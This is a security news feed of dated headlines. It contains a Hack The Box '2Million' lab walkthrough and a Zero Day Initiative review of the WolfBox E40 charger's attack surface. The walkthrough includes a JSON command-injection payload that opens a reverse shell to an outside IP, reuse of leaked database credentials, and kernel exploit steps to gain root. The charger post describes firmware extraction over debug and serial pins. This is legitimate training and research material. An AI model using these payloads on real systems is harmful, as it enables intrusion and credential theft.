Cisco Warns of Exploitation of Decade-Old ASA WebVPN VulnerabilityCisco on Monday updated an advisory to warn customers of active exploitation of a decade-old security flaw impacting its Adaptive Security Appliance (ASA). The vulnerability, tracked as CVE-2014-2120 (CVSS score: 4.3), concerns a case of insufficient input validation in ASA's WebVPN login page that could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack
by The Hacker News
2024-12-03 18:07:08
Unlocking the Power of AI in Intelligent Document ProcessingIntelligent document processing (IDP) has evolved beyond OCR, leveraging AI tools like NLP, LLMs, and computer vision to turn data into actionable insights.
by ITPro Today
2024-12-03 18:05:46
2million HTB walkthrough
It's been a very long time since I last dived into a Hack The Box machine, but today we're back with a fun and exciting journey into "2 Million", an easy retired HTB machine. In this write-up we tackle the machine in guided mode, a straightforward and structured approach designed to help beginners like me follow along with solid steps while enjoying the steep learning curve. Let's gear up and dive into this box together.

Initial Access

Task 1: How many TCP ports are open?

┌─[us-dedivip-1]─[10.10.14.72]─[mccleod1290@htb-zjn9n4winb]─[~]
└──╼ [★]$ nmap -p- --min-rate 10000 10.129.254.214
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 09:10 CST
Nmap scan report for 2million.htb (10.129.254.214)
Host is up (0.0093s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.87 seconds

Answer: 2

Task 2: What is the name of the JavaScript file loaded by the /invite page that has to do with invite codes?

Step 1: visit and check /invite. Step 2: open the browser console and check the Network tab; we see a request made to a JS file, and this is our answer.

Answer: inviteapi.min.js

Task 3: What JavaScript function on the invite page returns the first hint about how to get an invite code? Don't include () in the answer.

Step 1: open http://2million.htb/js/inviteapi.min.js and work through the code (ChatGPT helps with the packed script); this gives the answers for the next three tasks.

Answer: makeInviteCode

Task 4: The endpoint in makeInviteCode returns encrypted data. That message provides another endpoint to query. That endpoint returns a code value that is encoded with what very common binary-to-text encoding format. What is the name of that encoding?

This task involves numerous steps, from understanding the code to making a request to getting the invite code; let's break it down step by step.
Step 1: Analysing the code (with ChatGPT's help) we see two important functions inside the packed script:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}',24,24,'response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify'.split('|'),0,{}))

Step 2: If we send POST requests to these endpoints we get our responses, and one of the responses has the flag. The endpoint above gives us a base64-encoded value, which is our answer. We can use this invite code to sign up as a user.

Answer: base64

Task 5: What is the path to the endpoint the page uses when a user clicks on "Connection Pack"?

Look around the website; at this URL we can access the connection pack: http://2million.htb/home/access. The following is the embedded link for the connection pack: http://2million.htb/api/v1/user/vpn/generate

Task 6: How many API endpoints are there under /api/v1/admin?

We see that there are 3 endpoints for admin; we can get this by sending a GET request to /api/v1, or using this curl command:

curl -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=135culru6kejajj86ta2n6nh27" | jq

Answer: 3

Task 7: What API endpoint can change a user account to an admin account?

Answer: /api/v1/admin/settings/update

For some unknown reason we are unable to get any positive response from /api/v1/admin/*; we tried changing the request from GET to POST but nothing works.
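The packed script is the Dean Edwards-style p,a,c,k,e,d packer: each `\w+` token in `p` is an index (base `a`) into the word list `k`. As an added example that is not part of the write-up, here is a small Python unpacker run over the packed string and word list copied from the script above; it recovers the two functions and the endpoints they call, which is where the Task 3 answer and the path queried in Task 4 come from.

```python
"""Added example: unpack p,a,c,k,e,d-style packed JavaScript (inviteapi.min.js from
the box) and pull out the API endpoints it calls. The packed string and word list
are copied from the script; the unpacker is my own, not code from the box."""
import re

# The packer's arguments: p (packed source), a (radix), c (word count), k (word list).
PACKED_P = (
    '1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}'
    '1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}'
)
RADIX_A = 24
COUNT_C = 24
WORDS_K = (
    "response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|"
    "success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify"
).split("|")


def to_base(n, radix):
    """Integer -> token string the way the packer's e() does for radix <= 36
    (digits 0-9 then a-z). Larger radixes use a different alphabet and are not handled."""
    if radix > 36:
        raise ValueError("radix > 36 not supported by this unpacker")
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        out = digits[n % radix] + out
        n //= radix
        if n == 0:
            return out


def unpack(p, a, c, k):
    """Reverse the packer: token i in p stands for k[i], or for the token itself
    when the word list has no entry for it (the packer's k[c]||c.toString(a))."""
    table = {}
    for i in range(c):
        token = to_base(i, a)
        table[token] = k[i] if i < len(k) and k[i] else token
    # One pass, exactly like the packer's single replace with a \b\w+\b regex.
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p)


def extract_endpoints(js_source):
    """Collect the url:'...' values from the unpacked jQuery $.ajax calls, in order."""
    return re.findall(r"url:'([^']+)'", js_source)


UNPACKED = unpack(PACKED_P, RADIX_A, COUNT_C, WORDS_K)

if __name__ == "__main__":
    print(UNPACKED)
    print(extract_endpoints(UNPACKED))
```

The unpacked output reads `function verifyInviteCode(code){...url:'/api/v1/invite/verify'...}` and `function makeInviteCode(){...url:'/api/v1/invite/how/to/generate'...}`, so the function that returns the first hint is makeInviteCode and the endpoint to POST to is /api/v1/invite/how/to/generate.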
Let's have a look at /api/v1/user/* and first check /api/v1/user/auth. We see data returned in JSON, which means the application accepts JSON, so let's try some attacks by injecting something malicious into the JSON. Now we have valid JSON data to add to our HTTP parameters:

{"loggedin":true,"username":"userhello","is_admin":0}

Task 8: What API endpoint has a command injection vulnerability in it?

Answer: /api/v1/admin/vpn/generate

But when we try to access this endpoint we get HTTP/1.1 405 Method Not Allowed in the Burp response. So let's try /api/v1/user/vpn/generate. We can see that by copying the JSON data from the previous task and changing the content type to application/json we are able to achieve command injection; just make sure that the endpoint is accessed via POST!

Getting Shell

Now open a terminal and listen on port 443:

sudo nc -nlvp 443

Now in Burp Suite change the JSON part of the HTTP request to the following payload and you should get your reverse shell:

{"loggedin":true,"username":"; bash -c 'bash -i >& /dev/tcp/10.10.14.94/443 0>&1' ;","is_admin":0}

Task 9: What file is commonly used in PHP applications to store environment variable values?

After getting a shell, let's look around; we find .env on the system, which gives us a user and password. Let's reuse the username and password for SSH.

www-data@2million:/home/admin$ ls
ls
user.txt
www-data@2million:/home/admin$ cd /var/www/html
cd /var/www/html
www-data@2million:~/html$ ls
ls
Database.php  Router.php  VPN  assets  controllers  css  fonts  images  index.php  js  views
www-data@2million:~/html$ ls -la
ls -la
total 56
drwxr-xr-x 10 root root 4096 Dec  2 17:40 .
drwxr-xr-x  3 root root 4096 Jun  6  2023 ..
-rw-r--r--  1 root root   87 Jun  2  2023 .env
-rw-r--r--  1 root root 1237 Jun  2  2023 Database.php
-rw-r--r--  1 root root 2787 Jun  2  2023 Router.php
drwxr-xr-x  5 root root 4096 Dec  2 17:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6  2023 assets
drwxr-xr-x  2 root root 4096 Jun  6  2023 controllers
drwxr-xr-x  5 root root 4096 Jun  6  2023 css
drwxr-xr-x  2 root root 4096 Jun  6  2023 fonts
drwxr-xr-x  2 root root 4096 Jun  6  2023 images
-rw-r--r--  1 root root 2692 Jun  2  2023 index.php
drwxr-xr-x  3 root root 4096 Jun  6  2023 js
drwxr-xr-x  2 root root 4096 Jun  6  2023 views
www-data@2million:~/html$ cat .env
cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

ssh admin@10.129.254.214

Task 10: Submit the flag located in the admin user's home directory.

cat user.txt

Privilege Escalation

Task 11: What is the email address of the sender of the email sent to admin?

Usually local mail is stored in /var/mail; let's have a look at that folder and see if something is interesting.

Answer: ch4p@2million.htb

Task 12: What is the 2023 CVE ID for a vulnerability in that allows an attacker to move files in the Overlay file system while maintaining metadata like the owner and SetUID bits?

Answer: CVE-2023-0386

Task 13: Submit the flag located in root's home directory.

Step 1: First let's have a look at the proof of concept for this exploit. We will be using https://github.com/sxlmnwb/CVE-2023-0386 to gain privileges, and if you look closely it contains a lot of files and folders, so either compress it into a zip or download it as a zip file itself.

Step 2: Then, using scp, let's upload the file onto the victim machine:

sshpass -p SuperDuperPass123 scp CVE-2023-0386-main.zip admin@10.129.206.206:/tmp/

Now we should have the exploit code in a zip file in the /tmp folder.

Step 3: Unzip the code and compile the exploit; have a look at README.md for compiling the code.
admin@2million:/tmp$ unzip CVE-2023-0386-main.zip
Archive:  CVE-2023-0386-main.zip
c4c65cefca1365c807c397e953d048506f3de195
   creating: CVE-2023-0386-main/
  inflating: CVE-2023-0386-main/Makefile
...[snip]...
  inflating: CVE-2023-0386-main/test/mnt.c
admin@2million:/tmp$ cd CVE-2023-0386-main/
admin@2million:/tmp/CVE-2023-0386-main$ make all
gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl
fuse.c: In function ‘read_buf_callback’:
fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
  106 |             printf("offset %d\n", off);
      |                     ~^           ~~~
...[snip]...
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common':
(.text+0xaf4e): warning: Using 'dlopen' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
gcc -o exp exp.c -lcap
gcc -o gc getshell.c

Step 4: In the first session, I'll run the next command from the instructions:

admin@2million:/tmp/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0

Open another terminal; since we are on the CLI, we have to start another SSH session on the target:

ssh admin@10.129.254.214

Now in this terminal type in this command, and we should be the root user:

admin@2million:/tmp/CVE-2023-0386-main$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Jun  2 23:11 .
drwxrwxr-x 6 root   root     4096 Jun  2 23:11 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:/tmp/CVE-2023-0386-main#
root@2million:/# cat /root/root.txt

Beyond Root

Task 14: [Alternative Priv Esc] What is the version of the GLIBC library on TwoMillion?

admin@2million:~$ ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Answer: 2.35

Task 15: [Alternative Priv Esc] What is the CVE ID for the 2023 buffer overflow vulnerability in the GNU C dynamic loader?

Answer: CVE-2023-4911

Task 16: [Alternative Priv Esc] With a shell as admin or www-data, find a POC for Looney Tunables. What is the name of the environment variable that triggers the buffer overflow? After answering this question, run the POC and get a shell as root.

Repeat the steps from Task 13, this time with a CVE-2023-4911 exploit PoC, and you should get root.

Answer: GLIBC_TUNABLES
by HACKLIDO
2024-12-03 18:01:48
Detailing the Attack Surfaces of the WolfBox E40 EV Charger

The WolfBox E40 is a Level 2 electric vehicle charge station designed for residential home use. Its hardware has a minimal user interface, providing a Bluetooth Low Energy (BLE) interface for configuration and an NFC reader for user authentication. Typical for this class of devices, the appliance employs a mobile application for the owner's installation and regular operation of the equipment.

At the moment of writing, the software versions were reported as follows:
· Main module: 3.1.17
· MCU module: 1.2.6
· Mobile application: 1.0.3

WolfBox EV Mobile Application

The manufacturer distributes one application to configure and maintain the device. The application, named WolfBox EV, is available for both Android and iOS users.

Figure 1 - Application Start Screen

Interestingly, the application apparently allows pairing with and managing more than the expected EV charger devices; when attempting to add a new device, a list is presented that includes several other ostensibly known and accepted device types, such as lamps, switches, doorbells, mosquito repellent heaters, irrigators and battery packs, to name a few.

While Trend Micro Zero Day Initiative (ZDI) did not thoroughly investigate this application for vulnerabilities or other bugs, problems in mobile applications have been used by threat actors in the past and represent a significant attack surface. Even though the mobile application itself is out of scope for the Pwn2Own Automotive contest, the research community ought to thoroughly review it.

WolfBox E40 Hardware Analysis

Trend ZDI researchers have analyzed the discrete hardware components found in the device. The device itself is comprised of several printed circuit boards (PCBs) hosting the system; the "main PCB" contains power and communications electronics, while the human-machine interface is spread over three more PCBs, carrying correspondingly the LCD display, the NFC reader, and the LEDs.
Below is a list of notable parts on the main PCB:
· GigaDevice GD32F307VET6 (U12), ARM Cortex-M4 with 512K Flash
· Tuya CBU-IPEX WiFi/BLE radio (U11)
· Atmel ATMLH242 04CM (U13), likely to be an AT24C04 serial EEPROM
· Winbond 25Q64JVSIQ (U14), 64MB serial Flash

On the board itself, the two terminal blocks on the left couple the device to both the power inlet from the grid and to the charging cable. The two relay units control the flow of power, with current transformers inserted inline. On the right-hand side at the top, the board houses a low-current switching power supply for its finer electronics. Below it, there is a 1.0F supercap, the MCU, and the Wi-Fi/BLE communications module. Finally, there is an undocumented DIP switch and a host of connectors with nothing connected to them except the last one; the single white wire goes to the CP line of the charging plug.

Figure 2 - WolfBox power/processing board—top

Of special note is the CN17 connector located right beside the MCU, which is used for SWD debugging. On the bottom side, the only component of note is the serial Flash chip.

Figure 3 - WolfBox power/processing board—bottom

Finally, the main PCB is covered in conformal coating. Trend Micro researchers discovered the coating to be soluble in acetone, allowing for easy removal where needed to facilitate probing.

As a final note, Tuya provides some documentation regarding the wire protocol between their modules and system MCUs.

The display and LED boards do not present much in terms of interesting components. The NFC board, however, carries a SmartLink SL2823 NFC interface chip coupled to an anonymous part ostensibly used to translate between the SmartLink chip and the rest of the system.

Figure 4 - WolfBox NFC board

In terms of potential attack surface and vectors, the outermost exposed interfaces are handled by the communications module, which then passes messages to the main MCU that, in turn, controls the power and human interfaces.
As such, compromising the communications module may be a required step.

Firmware Extraction

The manufacturer, WolfBox, does not appear to provide any way to download firmware images or update packages for the device.

Thus, upon the discovery of CN17, an attempt was made to extract the firmware from the GigaDevice MCU. By connecting an ST-Link V2 dongle, the MCU was detected successfully by the ST-Link software, allowing its on-chip Flash memory to be read. This brought an unexpected end to the MCU firmware extraction journey.

Extracting firmware from the communications module proved to be a little more involved. The documentation for the module SoC, the BK7231N, could be found on the Tuya website. It is said the chip has either 2MB or 4MB of Flash memory. Further research uncovered a tool used by the open-source community to program custom firmware to Tuya devices, among others. Trend ZDI researchers used the tool to read a Flash image out from the module SoC. This required some soldering: a USB-to-UART dongle was used to communicate with the module with the following connections:
· Module TX on pin 15 -> UART bridge RX (white)
· Module RX on pin 16 -> UART bridge TX (green)
· Module ground on pin 16 -> UART bridge ground (black)

In addition, the module CEN (reset) signal on pin 18 was also used, and power was supplied from a bench power supply via CN17.

Figure 5 - A view of the USB-to-UART dongle soldered in place

After all connections were made, the following procedure was used to extract the flash contents:
1. Press and hold the SW2 button; this will hold the main MCU in reset, preventing it from interfering with communications.
2. Supply power to the board.
3. Start the uartprogram downloader script. The script will get stuck at Read Getting Bus....
4. Short the CEN signal to ground for a bit. The RF shield on the module can be used for that. This will apparently reboot the module into a state where the script can interact with it.
5. Check if readout has started on the console. If not, retry step 4 until successful. The script may need to be restarted.
6. Power off the board after the download has been completed.

Here is what it should look like on the console, along with the command line parameters that were used:

Firmware Analysis

Without going too deep, Trend ZDI researchers performed an initial analysis of the GigaDevice firmware.

As is typical for MCU-based devices, the firmware is one solid blob without any discernible structure such as a filesystem. Upon analyzing ASCII strings present in the dumped firmware image, it became obvious the firmware is built on top of uC/OS II, an embedded real-time operating system (RTOS). Multiple references to mBedTLS version 2.16.4 are also visible. Alongside that, there are multiple AT commands. This suggests the MCU firmware can also drive a wireless module over AT commands, although no such module is present in this configuration. In the present configuration, it would seem the bulk of handling Wi-Fi, BLE, TCP/IP, and TLS falls upon the communications module.

Unfortunately, there were not too many useful strings encountered in the communications module firmware. Most were JSON data which looked like logging records of some sort. The image itself appears to be partitioned as follows, with spans of unprogrammed memory in between:
· 0x000000: medium entropy; machine code. This is the bootloader.
· 0x011000: medium entropy; machine code. This is the application.
· 0x12B000: high entropy; unknown. This appears to be encrypted in ECB mode.
· 0x1CF000: high entropy; unknown. This appears to be encrypted in ECB mode.
· 0x1D0000: low entropy; marked as "TLV".
· 0x1D2000: low entropy; this could be some kind of filesystem. This is where log-like JSON data was identified.
· 0x1ED000: high entropy; unknown. This appears to be encrypted in ECB mode.

Worth noting: Tuya provides SDK source code access for BK7231N, which may prove useful during reverse engineering and vulnerability research efforts.
That said, Trend ZDI did not verify whether there were any changes made for WolfBox products.

Bluetooth Low Energy (BLE) Analysis

Using a BLE scanning tool, the Trend ZDI researchers observed the following Bluetooth LE endpoints on the WolfBox E40. When powered on, the device is visible under the name `TUYA_`. The device exposes a single service with three characteristics. It is reasonable to assume this is what the mobile application uses to discover the device. Additional information can likely be obtained by reverse engineering the mobile application.

Network Traffic Analysis

The charger can connect to a local Wi-Fi network. Trend ZDI researchers connected one device to investigate the network-side attack surface exposed by the device. During the initial setup, the charger reached out to h3-eu.iot-dns.com (alias of a3480a15a4710bb9d.awsglobalaccelerator.com, IP address 15.197.184.59) via HTTPS. This was followed by TCP port 443 connections to IP address 18.195.249.137, which had no prior DNS queries, and then again followed by a connection to 18.185.146.33 (AWS), TCP port 8886. UDP communication over port 7000 was also observed. Initially, the phone sent out packets to this port to broadcast addresses and received a response from the device's address. The packet contents are, unfortunately, encrypted in some way.

Figure 6 - Observed network communications

The phone also reached out to TCP port 6668 on the device. The observed traffic followed the same format with mostly encrypted payloads. After the app checked for software updates and was allowed to update to the latest version, the device queried DNS for fireware-ttls.tuyaeu.com (alias of tuya-fireware-update-8b783aab86e29e3a.elb.eu-central-1.amazonaws.com, IP 18.197.251.244) and connected to TCP port 2443 (protected by TLS) and proceeded to download the update. The device rebooted immediately after the download.
Having completed the update, the device queried DNS for m3.tuyaeu.com (alias of out-mqtt-tytls-43c09399a95b9ab8.elb.eu-central-1.amazonaws.com, IP 18.185.146.33 – matching the prior IP) and connected to TCP port 8886 there. This was followed by a query for a3.tuyaeu.com (IP 18.195.249.137 – matching the prior IP) and a connection to TCP port 443 there as well. The device kept TCP port 6668 open for connections over Wi-Fi. Of note, in-app actions related to device configuration (e.g., LED setup) resulted in communications over that connection.

Further research into the encrypted local communications pointed to this being a Tuya-specific protocol. Open-source implementations exist for it as well, such as the tuyapi library. This could be used as a good starting point in building a fuzzer for this protocol.

Summary

While these may not be the only attack surfaces available on the WolfBox E40 unit, they represent the most likely avenues a threat actor may use to exploit the device. We're excited to see what research is displayed in Tokyo during the Pwn2Own Automotive event. Stay tuned to the blog for attack surface reviews for other devices, and if you're curious, you can see all the devices included in the contest.

Until then, you can find me on Mastodon at @infosecdj, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
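The partition map in the Firmware Analysis section above is the kind of result an entropy scan over a raw flash dump produces. As an added example (not ZDI's tooling, and run on a constructed stand-in image rather than a WolfBox dump), the Python below labels 4 KiB windows by Shannon entropy, merges adjacent windows into regions, and flags high-entropy regions whose 16-byte blocks repeat, which is the usual observation behind an "appears to be ECB" call: a sound mode such as CBC, CTR or GCM practically never repeats a ciphertext block, while ECB over repetitive plaintext does. The window size, the entropy thresholds and the sample image layout are my own assumptions.

```python
"""Added example: entropy map of a raw flash image plus an ECB repeated-block
heuristic. The sample image is constructed here and is not a real dump."""
import math
import random
from collections import Counter

WINDOW = 0x1000        # scan granularity: one 4 KiB sector (assumption)
BLOCK = 16             # AES block size used by the repeated-block heuristic
LOW, HIGH = 3.0, 7.0   # bits per byte; thresholds are our own choice


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(window: bytes) -> str:
    """Label one window: unprogrammed (all 0xFF), low, medium or high entropy."""
    if window == b"\xff" * len(window):
        return "unprogrammed"   # erased NOR flash reads back as 0xFF
    h = shannon_entropy(window)
    if h < LOW:
        return "low"            # padding, TLV tables, sparse data
    if h < HIGH:
        return "medium"         # typical of machine code and text
    return "high"               # compressed or encrypted


def scan(image: bytes, window: int = WINDOW) -> list:
    """Return merged (offset, length, label) regions, i.e. a partition-style map."""
    regions = []
    for off in range(0, len(image), window):
        chunk = image[off:off + window]
        label = classify(chunk)
        if regions and regions[-1][2] == label:
            start, length, _ = regions[-1]
            regions[-1] = (start, length + len(chunk), label)
        else:
            regions.append((off, len(chunk), label))
    return regions


def looks_like_ecb(data: bytes, block: int = BLOCK) -> bool:
    """Heuristic: any repeated block inside high-entropy data points at ECB."""
    blocks = [data[i:i + block] for i in range(0, len(data) - block + 1, block)]
    return len(blocks) != len(set(blocks))


def ecb_suspects(image: bytes, regions: list) -> list:
    """Offsets of high-entropy regions whose blocks repeat."""
    return [off for off, length, label in regions
            if label == "high" and looks_like_ecb(image[off:off + length])]


def build_sample_image(seed: int = 0) -> bytes:
    """Constructed stand-in for a dumped image: code, erased gaps, an ECB-like
    region, a properly random-looking region and a zero-filled tail."""
    rng = random.Random(seed)
    opcodes = [rng.randrange(256) for _ in range(40)]            # narrow alphabet
    code = bytes(rng.choice(opcodes) for _ in range(0x2000))      # "machine code"
    blank = b"\xff" * 0x1000                                      # erased sector
    pool = [bytes(rng.randrange(256) for _ in range(BLOCK)) for _ in range(128)]
    ecb_like = b"".join(rng.choice(pool) for _ in range(0x2000 // BLOCK))
    random_like = bytes(rng.randrange(256) for _ in range(0x2000))
    zeros = b"\x00" * 0x1000
    return code + blank + ecb_like + blank + random_like + zeros


if __name__ == "__main__":
    img = build_sample_image()
    found = scan(img)
    for off, length, label in found:
        print(f"0x{off:06X}: {label} ({length:#x} bytes)")
    print("ECB suspects:", [hex(o) for o in ecb_suspects(img, found)])
```

On the constructed image the scanner reports a medium-entropy region at 0x0, erased gaps, two high-entropy regions of which only the first is flagged as an ECB suspect, and a low-entropy tail, mirroring the shape of the map in the post. On a real dump the same loop, pointed at the file read out over UART, gives a first cut at where the bootloader, application and encrypted partitions sit before any disassembly starts.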
by Zero Day Initiative Blog
2024-12-03 17:50:47
Cyber-Unsafe Employees Increasingly Put Orgs at RiskToo much access and privilege, plus a host of unsafe cyber practices, plague most workplaces, and the introduction of tools like GenAI will only make things worse.
by Dark Reading
2024-12-03 17:48:41
Hai's Latest Evolution: Intelligence, Context, and More Intuitive UX

Martijn Russchen, Tue, 12/03/2024 - 09:48

Transforming Security Program Management: A Day with Hai

Picture this: It's Monday morning, and your dashboard shows fifteen new vulnerability reports from the weekend. Your team meeting is in an hour, and the CISO wants an update on quarterly trends. Sound familiar?

Enter Hai. With its expanded capabilities, Hai simplifies your workload, creating polished data visualizations, spotting critical trends, and streamlining your workflows. Here's how:

1. Hai Program Insights: Instantly Understand Your Programs

Stop spending hours compiling data from individual programs. With Hai, actionable insights are just a question away. Whether prepping for a team meeting or analyzing quarterly performance, Hai delivers clarity with visualized metrics and trends.

Examples in Action:
"What's our current report volume compared to last month?"
"Show me how many critical vulnerabilities were reported this quarter."
"How much did we pay per asset this year?"

With the addition of HackerOne Benchmarks, Hai also supports benchmarking capabilities. For example, you can ask:
"How does my program's report volume compare to industry benchmarks?"

That elusive quarterly trend data? Hai gathers it from all relevant programs, presenting it in meaningful visualizations with actionable insights. By instantly surfacing tailored intelligence, Hai lets you focus on decision-making, scale cross-program mitigations, and prioritize work where it matters most.

Hai retains the complete history of your conversation, allowing you to ask multiple questions in a row while keeping track of the background. For example, suppose you're conducting a program performance analysis and must report it to your leadership.
In that case, you can simply ask Hai to summarize all the information collected so far and format it in a specific way, such as an email.

2. Contextual Conversation When It Matters

Imagine reviewing a complex vulnerability report and needing to pause to find additional information or instructions. Instead of digging through documentation or searching for answers, Hai delivers instant context. Its intelligent sidebar provides tailored suggestions based on your current task, whether explaining technical details or analyzing trends in your bounty spend.

Example in Action: While analyzing an SQL injection vulnerability, Hai might suggest:
· Relevant remediation guidance
· Key implications for your system security
· Follow-up actions to mitigate risk

With Hai, you're never working alone; it's like having an expert by your side. By providing on-the-spot insights and actionable recommendations, Hai helps you breeze through your report backlog, improve accuracy, and streamline team communication.

3. Improved UX: Seamless, Smarter Workflows

Hai's updated interface introduces a sleek new sidebar, transforming how you interact with your intelligent copilot. This streamlined design ensures that intelligence is always within reach and seamlessly integrated into your workflow. With intuitive follow-up suggestions, the sidebar guides you naturally from one task to the next, helping you stay focused and maximizing productivity.

From Information Overload to Instant Insight

The real power of Hai lies in its ability to remove the administrative burden from security teams. Instead of wrestling with platform navigation, hunting for instructions, or compiling scattered data, you can focus on making strategic security decisions. It's easy to get started with Hai program insights, creating powerful data visualizations and increasing cross-program efficiency. In fact, since its launch in April, Hai's adoption has surged by 170%, helping countless customers work faster and smarter.
Curious how much time your team could reclaim? Book a 15-minute Hai demonstration and bring your toughest program challenges; Hai has the answers.

Hai, HackerOne's AI copilot, has 3 new capabilities: Hai analytics, contextual conversations, and an enhanced user experience.
by HackerOne
2024-12-03 17:01:19
New Celestial Stealer JavaScript MaaS Platform Springs into ActionCybersecurity researchers at Trellix Advanced Research Center have unearthed Celestial Stealer, a novel Malware-as-a-Service (MaaS) offering targeting Windows 10 and 11 systems. This JavaScript-based infostealer is sold via Telegram and is designed to harvest sensitive user data from browsers, cryptocurrency wallets, and popular applications such as Discord and Steam. Celestial Stealer came to light during … The post New Celestial Stealer JavaScript MaaS Platform Springs into Action appeared first on CyberInsider.
by Cyber Insider
2024-12-03 16:51:09
’Tis the season to avoid holiday email scamsAs the holidays approach, businesses are busier than ever, and cybercriminals know it. Along with cheer, joy, and giving, the holidays also bring an unfortunate surge in cyber scams.
by Barracuda
2024-12-03 16:50:35
US Data Brokers Face FTC's Wrath Over Tracking Consumers OnlineThe Federal Trade Commission (FTC) has taken decisive action against Gravy Analytics and its subsidiary Venntel for unlawfully collecting and selling sensitive location data, which could reveal consumers' visits to highly sensitive sites. The FTC's proposed settlement bars the companies from using or selling such data and mandates the deletion of past location records. Gravy … The post US Data Brokers Face FTC's Wrath Over Tracking Consumers Online appeared first on CyberInsider.
by Cyber Insider
2024-12-03 16:19:13
Venom Spider Spins Web of New Malware for MaaS PlatformA novel backdoor malware and a loader that customizes payload names for each victim have been added to the threat group's cybercriminal tool set.
by Dark Reading
2024-12-03 15:53:39
Sophos named a Gartner® Peer Insights™ Customers’ Choice for Managed Detection and Response (MDR) Services for the 2nd timeSophos is the only vendor named a Customers’ Choice across Endpoint Protection Platforms, Network Firewalls, and Managed Detection and Response
by Sophos News
2024-12-03 15:47:00
NachoVPN Tool Exploits Flaws in Popular VPN Clients for System CompromiseCybersecurity researchers have disclosed a set of flaws impacting Palo Alto Networks and SonicWall virtual private network (VPN) clients that could be potentially exploited to gain remote code execution on Windows and macOS systems. "By targeting the implicit trust VPN clients place in servers, attackers can manipulate client behaviours, execute arbitrary commands, and gain high levels of access
by The Hacker News
2024-12-03 15:36:42
Intel CEO Forced Out by Board Frustrated With Slow ProgressGelsinger was given the option to retire or be removed.
by ITPro Today
2024-12-03 15:21:00
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft AttacksThe North Korea-aligned threat actor known as Kimsuky has been linked to a series of phishing attacks that involve sending email messages that originate from Russian sender addresses to ultimately conduct credential theft. "Phishing emails were sent mainly through email services in Japan and Korea until early September," South Korean cybersecurity company Genians said. "Then, from mid-September,
by The Hacker News
2024-12-03 15:20:56
FTC bans two data brokers from collecting and selling Americans’ sensitive location dataUS-based Gravy Analytics and Mobilewalla must also delete historic data collected on millions of Americans. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-03 15:19:17
Agentic AI Set To Rise, With New Cybersecurity Risks: GartnerThe autonomous technology could help CIO’s deliver their AI goals but needs legal and ethical guidelines.
by ITPro Today
2024-12-03 15:00:00
Ransomware's Grip on HealthcareUntil C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption.
by Dark Reading
2024-12-03 15:00:00
2025 Cybersecurity Trends That Redefine Resilience, Innovation, and TrustExplore how 2025’s biggest cybersecurity trends—AI-driven attacks, deepfakes, and platformization—are reshaping the security landscape. The post 2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust appeared first on NetSPI.
by NetSPI
2024-12-03 14:59:00
KnowBe4 Releases the Latest Phishing Trends in Q3 2024 Phishing Report, With QR Code Phishing on the RiseKnowBe4, the world-renowned cybersecurity platform that comprehensively addresses human risk management, today released its Q3 2024 Phishing Report. This quarter’s findings reveal the most frequently clicked email subjects in simulated phishing tests, demonstrating the continued efficacy of HR and IT-related phishing attempts.   KnowBe4’s Q3 2024 Phishing Report reveals that HR and IT-related phishing emails […] The post KnowBe4 Releases the Latest Phishing Trends in Q3 2024 Phishing Report, With QR Code Phishing on the Rise appeared first on IT Security Guru.
